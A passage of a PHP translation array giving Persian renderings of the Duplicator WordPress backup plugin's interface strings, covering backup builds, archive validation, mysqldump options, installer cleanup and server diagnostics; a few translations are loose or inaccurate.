issues.
Go to: Duplicator > Tools > General > Information > Utils and click the "Remove Installation Files" button'=>'فایل‌های نصب رزرو شده‌ی نسخه‌برداری در دایرکتوری ریشه شناسایی شده‌اند. لطفاً برای جلوگیری از مشکلات امنیتی، این فایل‌های نصب را حذف کنید.
به: نسخه‌برداری > ابزارها > عمومی > اطلاعات > ابزارها بروید و روی دکمه‌ی «حذف فایل‌های نصب» کلیک کنید.','This message will be removed after all installer files are removed. Installer files must be removed to maintain a secure site. Click the link above or button below to remove all installer files and complete the migration.'=>'این پیام پس از حذف تمامی فایل های نصب کننده حذف خواهد شد. برای حفظ امنیت سایت، فایل های نصب کننده باید حذف شوند. برای حذف همه فایل های نصب کننده و تکمیل انتقال، روی پیوند بالا یا دکمه زیر کلیک کنید.','Critical failure present in validation'=>'وجود نقص بحرانی در اعتبارسنجی','Problems adding items to archive.'=>'مشکل در اضافه کردن موارد به بایگانی.','Problem adding items to archive.'=>'مشکل در اضافه کردن موارد به بایگانی.','ERROR: Can\'t find Scanfile %s. Please ensure there no non-English characters in the Backup or schedule name.'=>'خطا: نمی‌توان فایل اسکن %s را پیدا کرد. لطفاً مطمئن شوید که هیچ کاراکتر غیر انگلیسی در نام پشتیبان یا برنامه وجود ندارد.','Click on "Resolve This" button to fix the JSON settings.'=>'برای رفع تنظیمات JSON روی دکمه‌ی «Resolve This» کلیک کنید.','Build Failure'=>'شکست ساخت','Backup build appears stuck so marking Backup as failed. Is the Max Worker Time set too high?.'=>'به نظر می‌رسد که فرآیند ساخت نسخه پشتیبان گیر کرده است، بنابراین نسخه پشتیبان به عنوان ناموفق علامت‌گذاری شده است. آیا حداکثر زمان کارگر (Max Worker Time) بیش از حد بالا تنظیم شده است؟.','Please contact your DataBase administrator to fix the error.'=>'لطفا برای رفع خطا با مدیر پایگاه داده خود تماس بگیرید.','ARCHIVE CONSISTENCY TEST: Pass'=>'آزمون سازگاری بایگانی: قبول','ERROR: Archive checksum is bad.'=>'خطا: مجموع مقابله‌ای بایگانی نامناسب است.','ERROR: Archive doesn\'t pass consistency check.'=>'خطا: بایگانی از بررسی سازگاری سربلند بیرون نمی‌آید.','ERROR: Archive is not valid zip archive.'=>'خطا: بایگانی، بایگانی زیپ معتبری نیست.','ERROR: Cannot open created archive. Error code = %1$s'=>'خطا: نمی‌توان آرشیو ایجاد شده را باز کرد. کد خطا = %1$s','ACTUAL FILE/DIRECTORY COUNT: %1$s'=>'تعداد واقعی فایل/دایرکتوری: %1$s','EXPECTED FILE/DIRECTORY COUNT: %1$s'=>'تعداد فایل/دایرکتوری مورد انتظار: %1$s','Can\'t find Scanfile %s. Please ensure there no non-English characters in the Backup or schedule name.'=>'نمی‌توانم فایل اسکن %s را پیدا کنم. لطفاً مطمئن شوید که هیچ کاراکتر غیرانگلیسی در نام پشتیبان یا زمان‌بندی وجود ندارد.','MySQL Server Port: %1$s isn\'t a valid port'=>'درگاه سرور MySQL: %1$s درگاه معتبری نیست','MySQL Server Host: %1$s isn\'t a valid host'=>'هاست سرور MySQL :%1$s یک هاست معتبر نیست','Files: %1$s isn\'t a valid file name'=>'فایل ها: %1$s نام فایل معتبر نیست','File extension: %1$s isn\'t a valid extension'=>'پسوند فایل:%1$s یک پسوند معتبر نیست','Directories: %1$s isn\'t a valid path'=>'راهنمای: %1$s یک مسیر معتبر نیست','Backup name can\'t be empty'=>'نام پشتیبان نمی‌تواند خالی باشد','Error writing installer contents'=>'خطا در نوشتن محتوای نصب کننده','Error reading DupArchive expander'=>'خطا در خواندن بسط‌دهنده‌ی DupArchive','Please tell us the reason so we can improve it.'=>'لطفا دلیلش رو بگید تا بتونیم بهترش کنیم.','Your response is sent anonymously.'=>'پاسخ شما به صورت ناشناس ارسال می‌شود.','Send & Deactivate'=>'ارسال و غیرفعال کردن','Skip & Deactivate'=>'رد کردن و غیرفعال کردن','If you have a moment, please let us know why you are deactivating'=>'اگر وقت دارید، لطفاً دلیل غیرفعال کردن را به ما اطلاع دهید','Quick Feedback'=>'بازخورد سریع','Pro version'=>'نسخه حرفه‌ای','I\'m switching over to the %s'=>'دارم به %s تغییر مسیر میدم','It\'s a temporary deactivation, I use the plugin all the time.'=>'این یک غیرفعال‌سازی موقت است، من همیشه از افزونه استفاده می‌کنم.','What does it need to do?'=>'چه کاری باید انجام دهد؟','It does not do what I need.'=>'کاری که من نیاز دارم را انجام نمی‌دهد.','What\'s the plugin name?'=>'اسم افزونه چیه؟','I found a different plugin that I like better.'=>'من یک افزونه متفاوت پیدا کردم که بیشتر دوستش دارم.','Please tell us what is not clear so that we can improve it.'=>'لطفا مواردی که واضح نیست را به ما بگویید تا بتوانیم آنها را اصلاح کنیم.','It\'s too confusing to understand.'=>'فهمیدنش خیلی گیج کننده است.','Kindly share what didn\'t work so we can fix it in future updates...'=>'لطفا مواردی که کار نکردند را به اشتراک بگذارید تا بتوانیم در به‌روزرسانی‌های بعدی آنها را اصلاح کنیم...','It\'s not working on my server.'=>'روی سرور من کار نمی‌کنه.','Contact Support'=>'تماس با پشتیبانی','Need help? We are ready to answer your questions.'=>'به کمک نیاز دارید؟ ما آماده پاسخگویی به سوالات شما هستیم.','Active Backup object error'=>'خطای شیء پشتیبان فعال','An unauthorized security request was made to this page. Please try again!'=>'یک درخواست امنیتی غیرمجاز به این صفحه ارسال شده است. لطفاً دوباره امتحان کنید!','Error building DupArchive Backup'=>'خطا در ساخت نسخه پشتیبان DupArchive','Logs'=>'گزارش ها','Information'=>'اطلاعات','Error Log File'=>'فایل گزارش خطا','Templates'=>'قالب‌ها','NOTICE: Safe mode (Advanced) was enabled during install, be sure to re-enable all your plugins.'=>'توجه: حالت ایمن (پیشرفته) هنگام نصب فعال شد، حتماً تمام افزونه‌های خود را دوباره فعال کنید.','NOTICE: Safe mode (Basic) was enabled during install, be sure to re-enable all your plugins.'=>'توجه: حالت ایمن (پایه) هنگام نصب فعال شد، حتماً تمام افزونه‌های خود را دوباره فعال کنید.','PHP Code'=>'کد پی اچ پی',' The custom path provided is not recognized as a valid mysqldump file:
'=>' مسیر سفارشی ارائه شده به عنوان فایل mysqldump معتبر شناخته نمی شود:
','mysqldump path:'=>'مسیر mysqldump:','Successfully Found:'=>'با موفقیت یافت شد:','To use WordPress timezone formats consider an upgrade to Duplicator Pro.'=>'برای استفاده از قالب‌های منطقه زمانی وردپرس، ارتقاء به Duplicator Pro را در نظر بگیرید.','License Key'=>'کلید مجوز','License'=>'مجوز','PHP Max Execution Mode'=>'حالت اجرای حداکثری PHP','Mode'=>'حالت','This value is represented in seconds. A value of 0 means no timeout limit is set for PHP.'=>'این مقدار بر حسب ثانیه نمایش داده می‌شود. مقدار ۰ به این معنی است که هیچ محدودیت زمانی برای PHP تعیین نشده است.','Time'=>'زمان','PHP Max Execution'=>'اجرای حداکثری PHP','RUNTIME DETAILS'=>'جزئیات زمان اجرا','Diagnose Server Setup'=>'تشخیص تنظیمات سرور','Start Two-Part Install Process'=>'شروع فرآیند نصب دو قسمتی','Yes. I have read the above overview and would like to continue!'=>'بله. من مطالب بالا را خوانده‌ام و مایلم ادامه دهم!','On Step 1 the "Backup Only the Database" checkbox will be auto checked.'=>'در مرحله ۱، گزینه «فقط از پایگاه داده پشتیبان تهیه کنید» به طور خودکار علامت زده می‌شود.','Click the button below to go back to Step 1.'=>'برای بازگشت به مرحله ۱، روی دکمه زیر کلیک کنید.','Please follow these steps:'=>'لطفا این مراحل را دنبال کنید:','How to install this Backup?'=>'چطور میشه این نسخه پشتیبان رو نصب کرد؟','Click to download both files'=>'برای دانلود هر دو فایل کلیک کنید','Click to download Backup file'=>'برای دانلود فایل پشتیبان کلیک کنید','Click to download installer file'=>'برای دانلود فایل نصبی کلیک کنید','Migrate large, multi-gig sites with'=>'سایت‌های بزرگ و چند گیگ را با [نرم‌افزار] مهاجرت دهید','No recursive sym-links found.'=>'هیچ پیوند نمادین بازگشتی یافت نشد.','Recursive Links:'=>'لینک‌های بازگشتی:','No unreadable items found.'=>'هیچ مورد غیرقابل خواندنی یافت نشد.','Unreadable Items:'=>'موارد غیرقابل خواندن:','Read Checks'=>'چک‌ها را بخوانید','*Checking a directory will exclude all items in that path recursively.'=>'*بررسی یک دایرکتوری، تمام موارد موجود در آن مسیر را به صورت بازگشتی حذف می‌کند.','No add on sites found.'=>'هیچ افزونه‌ای در سایت‌ها یافت نشد.','Addon Sites'=>'سایت‌های افزونه','*Checking a directory will exclude all items recursively from that path down. Please use caution when filtering directories.'=>'*بررسی یک دایرکتوری همه موارد را به صورت بازگشتی از آن مسیر حذف می کند. لطفاً هنگام فیلتر کردن دایرکتوری ها احتیاط کنید.','uncompressed'=>'فشرده نشده','The core WordPress file below will NOT be included in the Backup. This file is required for WordPress to function!'=>'فایل اصلی وردپرس که در زیر آمده است، در نسخه پشتیبان گنجانده نخواهد شد. این فایل برای عملکرد وردپرس مورد نیاز است!','The core WordPress paths below will NOT be included in the Backup. These paths are required for WordPress to function!'=>'مسیرهای اصلی وردپرس که در زیر آمده‌اند در پشتیبان‌گیری لحاظ نخواهند شد. این مسیرها برای عملکرد وردپرس ضروری هستند!',' Use caution when excluding tables! It is highly recommended to not exclude WordPress core tables*, unless you know the impact.'=>' هنگام حذف جداول احتیاط کنید! به شدت توصیه می شود که جداول اصلی وردپرس* را حذف نکنید، مگر اینکه تأثیر آن را بدانید.','Excluding certain tables can cause your site or plugins to not work correctly after install!
'=>'حذف برخی جداول می تواند باعث شود سایت یا افزونه های شما پس از نصب به درستی کار نکنند!
','Checked tables will be excluded from the database script. '=>'جداول مورد بررسی از اسکریپت پایگاه داده حذف شده خواهد بود. ','directories'=>'دایرکتوری ها','If the root WordPress path is not writable by PHP on some systems this can cause issues.'=>'اگر مسیر ریشه وردپرس در برخی سیستم‌ها توسط PHP قابل نوشتن نباشد، می‌تواند مشکلاتی ایجاد کند.','Help review the plugin!'=>'در بررسی افزونه کمک کنید!','Need help with the plugin?'=>'برای کار با افزونه به کمک نیاز دارید؟','Other Resources:'=>'منابع دیگر:','Frequently Asked Questions!'=>'سوالات متداول!','How do I install a Backup?'=>'چطور میتونم بک آپ نصب کنم؟','How do I create a Backup'=>'چگونه یک نسخه پشتیبان ایجاد کنم','Common Questions:'=>'سوالات متداول:','Duplicator Help'=>'راهنمای دستگاه کپی','New to Duplicator?'=>'تازه با دستگاه کپی آشنا شدید؟','OneDrive'=>'وان‌درایو','DropBox'=>'دراپ باکس','cPanel'=>'سی‌پنل','Large Site Support'=>'پشتیبانی سایت‌های بزرگ','Cloud Storage'=>'فضای ذخیره‌سازی ابری','Invalid token permissions to perform this request.'=>'مجوزهای توکن برای انجام این درخواست نامعتبر است.','Redirecting Please Wait...'=>'در حال هدایت لطفا صبر کنید...','Final step(s):'=>'مرحله(های) نهایی:','re-activate the plugins'=>'افزونه‌ها را دوباره فعال کنید','During the install safe mode was enabled deactivating all plugins.
Please be sure to '=>'در طول نصب حالت امن غیرفعال کردن تمام افزونه ها فعال شد.
لطفا مطمئن شوید ','Safe Mode:'=>'حالت ایمن:','Note: Symlinks are not discoverable on Windows OS with PHP'=>'توجه: Symlinks در سیستم عامل ویندوز با PHP قابل تشخیص نیست','Support'=>'پشتیبانی','Remove Installation Files'=>'حذف فایل های نصب شده','Security Notes'=>'نکات امنیتی','/usr/bin/mypath/mysqldump'=>'/usr/bin/mypath/mysqldump','Allowed Runtime:'=>'زمان اجرای مجاز:','Host Build Interrupt'=>'وقفه ساخت میزبان','Error applying filters. Please go back to Step 1 to add filter manually!'=>'خطا در استفاده از فیلترها لطفا به مرحله 1 بروید تا فیلتر را به صورت دستی اضافه کنید!','Initializing Please Wait...'=>'در حال مقداردهی اولیه لطفا صبر کنید...','Manual copy of selected text required on this browser.'=>'کپی دستی متن انتخاب شده در این مرورگر الزامی است.','Copied to Clipboard!'=>'در کلیپ بورد کپی شد!','No files have been selected!'=>'هیچ فایلی انتخاب نشده است!','No directories have been selected!'=>'هیچ دایرکتوری انتخاب نشده است!','Directory applied filter set.'=>'مجموعه فیلتر اعمال شده در دایرکتوری.','Copy the paths above and apply them as needed on Step 1 > Archive > Files section.'=>'مسیرهای بالا را کپی کنید و در صورت نیاز در بخش مرحله ۱ > بایگانی > فایل‌ها اعمال کنید.','Click to Copy'=>'برای کپی کردن کلیک کنید','Auto filters are applied to prevent archiving other backup sets.'=>'فیلترهای خودکار برای جلوگیری از بایگانی سایر مجموعه‌های پشتیبان اعمال می‌شوند.','[view json result report]'=>'[نمایش گزارش نتیجه ی json]','Path filters will be skipped during the archive process when enabled.'=>'در صورت فعال بودن، فیلترهای مسیر در طول فرآیند بایگانی نادیده گرفته می‌شوند.','No custom file filters set.'=>'هیچ فیلتر فایل سفارشی تنظیم نشده است.','No custom directory filters set.'=>'هیچ فیلتر دایرکتوری سفارشی تنظیم نشده است.','Copy Quick Filter Paths'=>'کپی کردن مسیرهای فیلتر سریع','Scan Details'=>'جزئیات اسکن','3. %1$s if this host supports the option.'=>'۳. %1$s اگر این میزبان از این گزینه پشتیبانی کند.','Enable mysqldump'=>'فعال کردن mysqldump','2. Remove post revisions and stale data from tables. Tables such as logs, statistical or other non-critical data should be cleared.'=>'2. ویرایش نسخه های پست و داده های قدیمی از جداول را حذف کنید. جداول مانند سیاهههای مربوط، داده های آماری یا غیر بحرانی باید پاکسازی شوند.','RECOMMENDATIONS:'=>'توصیه‌ها:','TABLE DETAILS:'=>'جزئیات جدول:','TOTAL SIZE'=>'اندازه کل','No file/directory name warnings found.'=>'هیچ هشداری در مورد نام فایل/دایرکتوری یافت نشد.',' Only consider using this filter if the Backup build is failing. Select files that are not important to your site or you can migrate manually.'=>' فقط در صورتی که ساخت نسخه پشتیبان با شکست مواجه شد، استفاده از این فیلتر را در نظر بگیرید. فایل‌هایی را انتخاب کنید که برای سایت شما مهم نیستند یا می‌توانید آن‌ها را به صورت دستی منتقل کنید.','Unicode and special characters such as "*?><:/\\|", can be problematic on some hosts.'=>'یونیکد و کاراکترهای خاص مانند "*?><:/\\|" می توانند در برخی از هاست ها مشکل ساز باشند.','Copy Paths to Clipboard'=>'کپی کردن مسیرها به کلیپ بورد','Add Filters & Rescan'=>'اضافه کردن فیلترها و اسکن مجدد','No large files found during this scan.'=>'در طول این اسکن هیچ فایل حجیمی یافت نشد.','Core WordPress directories should not be filtered. Use caution when excluding files.'=>'دایرکتوری‌های اصلی وردپرس نباید فیلتر شوند. هنگام حذف فایل‌ها احتیاط کنید.','Show All'=>'نمایش همه','Hide All'=>'پنهان کردن همه','Quick Filters'=>'فیلترهای سریع','Apply the "Quick Filters" below or click the back button to apply on previous page.'=>'«فیلترهای سریع» زیر را اعمال کنید یا برای اعمال در صفحه قبل، روی دکمه برگشت کلیک کنید.','Timeout Options'=>'گزینه‌های تایم‌اوت','more details...'=>'جزئیات بیشتر...','Compressing larger sites on some budget hosts may cause timeouts. '=>'فشرده سازی سایت های بزرگتر در برخی از میزبان های بودجه ممکن است باعث وقفه شود. ','Size Checks'=>'بررسی اندازه','Show Scan Details'=>'نمایش جزئیات اسکن','PHP Max Execution Time'=>'حداکثر زمان اجرای PHP','PHP Open Base Dir'=>'دایرکتوری پایه باز PHP','The minimum PHP version supported by Duplicator is 5.2.9. It is highly recommended to use PHP 5.3+ for improved stability. For international language support please use PHP 7.0+.'=>'حداقل نسخه PHP پشتیبانی شده توسط داپلیکیتور 5.2.9 است. استفاده از PHP 5.3+ برای بهبود پایداری به شدت توصیه می شود. برای پشتیبانی از زبان بین المللی لطفا از PHP 7.0+ استفاده کنید.','Show Diagnostics'=>'نمایش تشخیص','Good'=>'خوب','Toggle a default name'=>'تغییر نام پیش‌فرض','Add Notes'=>'اضافه کردن یادداشت','Database Only'=>'فقط پایگاه داده','Backup Database Only Enabled'=>'فقط پشتیبان‌گیری از پایگاه داده فعال است','Database Mode'=>'حالت پایگاه داده','Take me there now!'=>'همین الان من را به آنجا ببر!','Remove Installation Files Now!'=>'همین حالا فایل‌های نصب را حذف کنید!','Optionally, Review Duplicator at WordPress.org...'=>'در صورت تمایل، نسخه برداری را در WordPress.org بررسی کنید...','Migration Almost Complete!'=>'مهاجرت تقریباً کامل شد!','This site has been successfully migrated!'=>'این سایت با موفقیت منتقل شد!','Save Backup Settings'=>'ذخیره تنظیمات پشتیبان','Processing'=>'پردازش','Visuals'=>'تصاویر','Backup Settings Saved'=>'تنظیمات پشتیبان ذخیره شد','Save General Settings'=>'تنظیمات عمومی را ذخیره کنید','General Settings Saved'=>'تنظیمات عمومی ذخیره شده','Schedules'=>'برنامه‌ها','Google Drive'=>'گوگل درایو','Amazon S3'=>'آمازون اس3','Disabled'=>'معلول','Suhosin Extension'=>'افزونه سوهوسین','This can take several minutes.'=>'این می‌تواند چند دقیقه طول بکشد.','Keep this window open during the scan process.'=>'این پنجره را در طول فرآیند اسکن باز نگه دارید.','WordPress Root Path:'=>'مسیر ریشه وردپرس:','example: DatabaseUserName (value is optional)'=>'مثال: نام کاربری پایگاه داده (مقدار آن اختیاری است)','example: DatabaseName (value is optional)'=>'مثال: نام پایگاه داده (مقدار اختیاری است)','example: 3306 (value is optional)'=>'مثال: ۳۳۰۶ (مقدار اختیاری است)','example: localhost (value is optional)'=>'مثال: localhost (مقدار اختیاری است)','MySQL version 5.0+ or better is required and the PHP MySQLi extension (note the trailing \'i\') is also required. Contact your server administrator and request that mysqli extension and MySQL Server 5.0+ be installed.'=>'MySQL نسخه 5.0+ یا بهتر مورد نیاز است و پسوند PHP MySQLi (به دنباله \'i\' توجه کنید) نیز مورد نیاز است. با سرپرست سرور خود تماس بگیرید و درخواست کنید که پسوند mysqli و MySQL Server 5.0+ نصب شود.','Migrate and backup a copy of your WordPress files and database. Duplicate and move a site from one location to another quickly.'=>'یک کپی از فایل‌ها و پایگاه داده وردپرس خود را منتقل و پشتیبان‌گیری کنید. یک سایت را به سرعت از یک مکان به مکان دیگر کپی و منتقل کنید.','This will run the scan validation check. This may take several minutes. Do you want to Continue?'=>'این کنترل چک اسکن را اجرا خواهد کرد. این ممکن است چندین دقیقه طول بکشد. آیا میخواهید ادامه دهید؟','Run Validator'=>'اجرای اعتبار سنجی','Clear Build Cache?'=>'کش ساخت پاک شود؟','By Day'=>'بر اساس روز','By Month'=>'بر اساس ماه','By Year'=>'بر اساس سال','Removing Backups, Please Wait...'=>'در حال حذف نسخه‌های پشتیبان، لطفا صبر کنید...','Selection Required'=>'انتخاب مورد نیاز','Bulk Action Required'=>'اقدام دسته جمعی مورد نیاز است','The database size represents only the included tables. The process for gathering the size uses the query SHOW TABLE STATUS. The overall size of the database file can impact the final size of the Backup.'=>'اندازه پایگاه داده فقط جداول موجود را نشان می دهد. فرآیند جمع آوری اندازه از عبارت نمایش وضعیت جدول استفاده می کند. اندازه کلی فایل پایگاه داده می تواند بر اندازه نهایی پشتیبان گیری تأثیر بگذارد.','Database Size:'=>'اندازه پایگاه داده:','This is not a multisite install so duplication will proceed without issue. Duplicator does not officially support multisite. However, Duplicator Pro supports duplication of a full multisite network and also has the ability to install a multisite subsite as a standalone site.'=>'این یک نصب چند سایتی نیست، بنابراین تکرار بدون مشکل ادامه خواهد داشت. داپلیکیتور به طور رسمی از چند سایت پشتیبانی نمی کند. با این حال، داپلیکیتور پرو از کپی کردن یک شبکه کامل چند سایتی پشتیبانی می کند و همچنین قابلیت نصب یک سایت فرعی چند سایتی را به عنوان یک سایت مستقل دارد.','Multisite: N/A'=>'چندسایتی: ناموجود','Multisite: Unsupported'=>'چندسایتی: پشتیبانی نمی‌شود','Get faster builds with Duplicator Pro with access to shell_exec zip.'=>'با Duplicator Pro و دسترسی به shell_exec zip، ساخت‌های سریع‌تری داشته باشید.','Reset Backup Settings?'=>'تنظیمات پشتیبان‌گیری را بازنشانی کنید؟','Cancel'=>'لغو','OK'=>'باشه','Processing please wait...'=>'در حال پردازش لطفا صبر کنید...','Top 20'=>'20 برتر','enable only for large archives'=>'فقط برای بایگانی‌های بزرگ فعال شود','A higher limit size will speed up the database build time, however it will use more memory. If your host has memory caps start off low.'=>'اندازه‌ی بالاتر، زمان ساخت پایگاه داده را سرعت می‌بخشد، اما از حافظه‌ی بیشتری استفاده می‌کند. اگر میزبان شما محدودیت حافظه دارد، از مقدار کم شروع کنید.','PHP Query Limit Size'=>'محدودیت اندازه کوئری PHP','Custom Path'=>'مسیر سفارشی','Mysqldump'=>'مای‌اس‌کیوال‌دامپ','recommended'=>'توصیه شده','Please contact the host or server administrator to enable this feature.'=>'برای فعال کردن این قابلیت، لطفا با مدیر هاست یا سرور تماس بگیرید.','This server does not support the PHP shell_exec or exec function which is required for mysqldump to run. '=>'این سرور از تابع shell_exec یا exec در PHP که برای اجرای mysqldump لازم است، پشتیبانی نمی‌کند. ','The UTC date format shown in the \'Created\' column on the Backups screen.'=>'قالب تاریخ UTC که در ستون «ایجاد شده» در صفحه پشتیبان‌گیری‌ها نشان داده شده است.','Created Format'=>'قالب ایجاد شده','Scanning Environment... This may take a few minutes.'=>'محیط اسکن ... این ممکن است چند دقیقه طول بکشد.','Enable debug options throughout user interface'=>'فعال کردن گزینه‌های اشکال‌زدایی در سراسر رابط کاربری','Debugging'=>'اشکال‌زدایی','Debug'=>'اشکال‌زدایی','Run Scan Integrity Validation'=>'اجرای اعتبار یکپارچگی اسکن را اجرا کنید','Scan Validator'=>'اسکن معتبر','If Duplicator does not have enough permissions then you will need to manually create the paths above.   '=>'اگر Duplicator مجوزهای کافی را نداشته باشد، باید مسیرهای بالا را به صورت دستی ایجاد کنید. ','Rate Duplicator'=>'نرخ تکثیر','- Symbolic link recursion can cause timeouts. Ask your server admin if any are present in the scan path. If they are add the full path as a filter and try running the scan again.'=>'- بازگشت لینک نمادین می‌تواند باعث وقفه شود. از مدیر سرور خود بپرسید که آیا در مسیر اسکن چنین مواردی وجود دارد یا خیر. در صورت وجود، مسیر کامل را به عنوان فیلتر اضافه کنید و دوباره اسکن را اجرا کنید.','- On some budget hosts scanning over 30k files can lead to timeout/gateway issues. Consider scanning only your main WordPress site and avoid trying to backup other external directories.'=>'- در برخی از هاست‌های ارزان‌قیمت، اسکن بیش از 30 هزار فایل می‌تواند منجر به مشکلات timeout/gateway شود. فقط سایت اصلی وردپرس خود را اسکن کنید و از تلاش برای پشتیبان‌گیری از سایر دایرکتوری‌های خارجی خودداری کنید.','Common Issues:'=>'مشکلات رایج:','3. This message will go away once the correct filters are applied.'=>'۳. این پیام پس از اعمال فیلترهای صحیح از بین خواهد رفت.','2. Continue to add/remove filters to isolate which path is causing issues.'=>'۲. به اضافه کردن/حذف فیلترها ادامه دهید تا مشخص شود کدام مسیر باعث ایجاد مشکل می‌شود.','1. Go back and create a root path directory filter to validate the site is scan-able.'=>'۱. به عقب برگردید و یک فیلتر دایرکتوری مسیر ریشه ایجاد کنید تا تأیید شود که سایت قابل اسکن است.','Unable to perform a full scan, please try the following actions:'=>'قادر به انجام اسکن کامل نیستید، لطفاً اقدامات زیر را امتحان کنید:','optional'=>'اختیاری','All values in this section are'=>'تمام مقادیر این بخش','OptinMonster'=>'اوپتین مانستر','Duplicator recommends going with the high performance pro plan or better from our recommended list'=>'Duplicator توصیه می‌کند که از لیست پیشنهادی ما، طرح حرفه‌ای با عملکرد بالا یا بهتر را انتخاب کنید','Host Recommendation:'=>'توصیه میزبان:','4. For table name case sensitivity issues either rename the table with lower case characters or be prepared to work with the %1$s system variable setting.'=>'۴. برای مشکلات حساسیت به حروف کوچک و بزرگ در نام جدول، یا نام جدول را به حروف کوچک تغییر دهید یا آماده کار با تنظیمات متغیر سیستمی %1$s باشید.','lower_case_table_names'=>'نام جدول با حروف کوچک','1. Run a %1$s on the table to improve the overall size and performance.'=>'۱. برای بهبود اندازه و عملکرد کلی، یک %1$s روی میز اجرا کنید.','Overview'=>'نمای کلی','None of the reserved files where found from a previous install. This means you are clear to create a new Backup.'=>'هیچ یک از فایل های رزرو شده از نصب قبلی پیدا نشد. این بدان معنی است که شما می توانید یک نسخه پشتیبان جدید ایجاد کنید.','Error Processing'=>'پردازش خطا','This option is only available with mysqldump mode.'=>'این گزینه فقط با حالت mysqldump در دسترس است.','no_field_options'=>'بدون_فیلد_آپشن','no_key_options'=>'بدون_گزینه_کلید','no_table_options'=>'بدون_گزینه_جدول','mysql40'=>'مای‌اس‌کیوال۴۰','Compatibility Mode:'=>'حالت سازگاری:','Compatibility Mode'=>'حالت سازگاری','Enable Table Filters:'=>'فعال کردن فیلترهای جدول:','Backups » New'=>'پشتیبان‌گیری » جدید','Backups » All'=>'پشتیبان‌گیری » همه','Learn More'=>'اطلاعات بیشتر','- not set -'=>'- تنظیم نشده -','MySQL Compatibility Mode Enabled'=>'حالت سازگاری MySQL فعال شد','Extensions'=>'افزونه‌ها','- no filters -'=>'- بدون فیلتر -','Filters'=>'فیلترها','ZipArchive'=>'بایگانی زیپ','Build Mode'=>'حالت ساخت','FILES'=>'فایل‌ها','Additional Storage:'=>'فضای ذخیره‌سازی اضافی:','in-complete'=>'ناقص','completed'=>'تکمیل شد','Status'=>'وضعیت','error running'=>'خطا در اجرا','Runtime'=>'زمان اجرا','PHP'=>'پی اچ پی','Mysql'=>'مای اس کیو ال','- unknown -'=>'- ناشناخته -','- no notes -'=>'- بدون یادداشت -','Full Name'=>'نام و نام خانوادگی','ID'=>'شناسه','Invalid Backup ID request. Please try again!'=>'درخواست شناسه پشتیبان نامعتبر است. لطفا دوباره امتحان کنید!','Transfer'=>'انتقال','Custom Search & Replace'=>'جستجو و جایگزینی سفارشی','File Filters'=>'فیلترهای فایل','Email Alerts'=>'هشدارهای ایمیل','Feature'=>'ویژگی','Duplicator'=>'تکثیرکننده','Auto Refresh'=>'بازخوانی خودکار','Refresh'=>'تازه کردن','Options'=>'تنظیمات','The process that PHP runs under does not have enough permissions to create files. Please contact your hosting provider for more details'=>'پروسه‌ای که PHP اجرا می‌کند مجوز کافی برای ایجاد فایل‌ها ندارد. برای اطلاعات بیشتر لطفاً با ارائه دهنده خدمات میزبانی خود تماس بگیرید','The snapshots directory does not have the correct permissions to write files. Try setting the permissions to 755'=>'دایرکتوری snapshots مجوزهای صحیحی برای نوشتن فایل ها ندارد. مجوزها را روی 755 تنظیم کنید','The web server does not support returning .log file extentions'=>'سرور وب شما از پسوند .log پشتیبانی نمی کند. بنا بر این می توانید به سرور خود اطلاع دهید تا مشکل را بررسی و رفع نمایند','Reasons for log file not showing'=>'دلایل عدم نمایش فایل لاگ','Try to create a Backup, since no log files were found in the snapshots directory with the extension *.log'=>'سعی کنید یک نسخه پشتیبان ایجاد کنید، زیرا هیچ فایل لاگی با پسوند *.log در دایرکتوری snapshots یافت نشد.','Log file not found or unreadable'=>'فایل لاگ یافت نشد و یا قابل خواندن نیست','PHP Information'=>'اطلاعات PHP','Free Space'=>'فضای رایگان','Server Disk'=>'دیسک سرور','mysqldump Path'=>'مسیر mysqldump','Max Allowed Packets'=>'حداکثر بسته‌های مجاز','Wait Timeout'=>'مهلت انتظار','Shell Exec Zip'=>'شل اکس زیپ','Not Supported'=>'پشتیبانی نمی‌شود','Is Supported'=>'پشتیبانی می‌شود','Memory In Use'=>'حافظه در حال استفاده','Memory Limit'=>'محدودیت حافظه','Off'=>'خاموش','On'=>'روشن','Charset'=>'مجموعه کاراکتر','Language'=>'زبان','Client IP'=>'آی‌پی کلاینت','Server IP'=>'آی پی سرور','Loaded PHP INI'=>'فایل PHP INI بارگذاری شده','Root Path'=>'مسیر ریشه','Server Time'=>'زمان سرور','Timezone'=>'منطقه زمانی','Operating System'=>'سیستم عامل','Duplicator Version'=>'نسخه تکثیرکننده','Server Settings'=>'تنظیمات سرور','This process will remove all build cache files. Be sure no backups are currently building or else they will be cancelled.'=>'این فرآیند تمام فایل های کش ساخت را حذف می کند. مطمئن شوید که در حال حاضر هیچ نسخه پشتیبان ساخته نمی شود وگرنه لغو خواهند شد.','Removes all build data from:'=>'حذف همه داده های ساخت از:','Clear Build Cache'=>'پاکسازی کش ساخت','Removes all reserved installer files.'=>'تمام فایل های نصب کننده رزرو شده را حذف می کند.','Build cache removed.'=>'کش ساخت حذف شد.','Found'=>'پیدا شد','Mysqldump was not found at its default location or the location provided. Please enter a custom path to a valid location where mysqldump can run. If the problem persist contact your host or server administrator. '=>' Mysqldump در مکان پیش فرض یا مکان ارائه شده یافت نشد. لطفاً یک مسیر سفارشی به یک مکان معتبر که در آن mysqldump می تواند اجرا شود وارد کنید. اگر مشکل همچنان ادامه داشت با میزبان یا سرپرست سرور خود تماس بگیرید.','Query Limit Size'=>'محدودیت اندازه پرس و جو','This will attempt to keep a network connection established for large archives.'=>'این تلاش خواهد کرد تا اتصال شبکه را برای بایگانی‌های بزرگ برقرار نگه دارد.','Attempt Network Keep Alive'=>'تلاش برای زنده نگه داشتن شبکه','Disable .htaccess file in storage directory'=>'غیرفعال کردن فایل .htaccess در دایرکتوری ذخیره‌سازی','Delete Entire Storage Directory'=>'حذف کل دایرکتوری ذخیره‌سازی','Delete Plugin Settings'=>'تنظیمات افزونه را حذف کنید','Uninstall'=>'حذف نصب','Plugin'=>'افزونه','General'=>'عمومی','Build Folder:'=>'پوشه ساخت:','Notice'=>'اطلاعیه','Build Status'=>'وضعیت ساخت','Unable to report on database stats'=>'گزارش‌گیری از آمار پایگاه داده امکان‌پذیر نیست','Unable to report on any tables'=>'امکان گزارش‌گیری از هیچ جدولی وجود ندارد','Rescan'=>'اسکن مجدد','Back'=>'برگشت','Error Message:'=>'پیام خطا:','Server Status:'=>'وضعیت سرور:','Please try again!'=>'لطفا دوباره امتحان کنید!','Scan Error'=>'خطای اسکن','Please review the details for each section by clicking on the detail title.'=>'لطفا جزئیات هر بخش را با کلیک روی عنوان جزئیات بررسی کنید.','Scan checks are not required to pass, 